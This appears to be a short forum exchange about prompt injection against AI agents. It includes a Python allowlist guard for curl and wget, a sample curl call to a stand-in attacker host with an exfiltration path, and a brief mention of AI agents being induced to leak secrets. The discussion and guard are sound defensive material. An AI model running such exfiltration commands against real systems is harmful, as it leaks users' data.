dvt | 6 hours ago
Everything in an LLM is "evaluated," so I'm not sure where the confusion comes from. We need to be careful when we use `eval()`, and we need to be careful when we tell LLMs secrets. The Claude issue above is trivially solved by blocking commands like curl, or by manually specifying which domains are allowed (if we're okay with curl at all).
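(A minimal sketch of the kind of guard described above, assuming a tool layer that can inspect a proposed shell command before running it. The names here, `ALLOWED_DOMAINS` and `is_command_allowed`, are hypothetical, not part of any Claude or agent API.)

```python
# Sketch: block network commands unless every URL they touch is on an
# explicit domain allowlist. Hypothetical example, not a real agent config.
import shlex
from urllib.parse import urlparse

ALLOWED_DOMAINS = {"api.example.com"}      # assumed allowlist
NETWORK_COMMANDS = {"curl", "wget"}        # commands subject to the check

def is_command_allowed(command: str) -> bool:
    """Allow non-network commands; allow network commands only if every
    URL argument points at an allowlisted domain."""
    tokens = shlex.split(command)
    if not tokens or tokens[0] not in NETWORK_COMMANDS:
        return True  # not a network command; out of scope for this check
    for token in tokens[1:]:
        if token.startswith(("http://", "https://")):
            host = urlparse(token).hostname or ""
            if host not in ALLOWED_DOMAINS:
                return False  # URL outside the allowlist: reject
    return True

print(is_command_allowed("curl https://api.example.com/v1/items"))  # True
print(is_command_allowed("curl https://attacker.example/exfil"))    # False
```

A real guard would also have to handle bare hostnames, redirects, and other tools that can make network calls, which is exactly where the per-case whack-a-mole starts.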
stavros | 6 hours ago | parent
The confusion comes from the fact that you're saying "it's easy to solve this particular case" and I'm saying "it's currently impossible to solve prompt injection for every case". Since the original point was about solving all prompt injection vulnerabilities, it doesn't matter whether we can solve this particular one; the point is still wrong.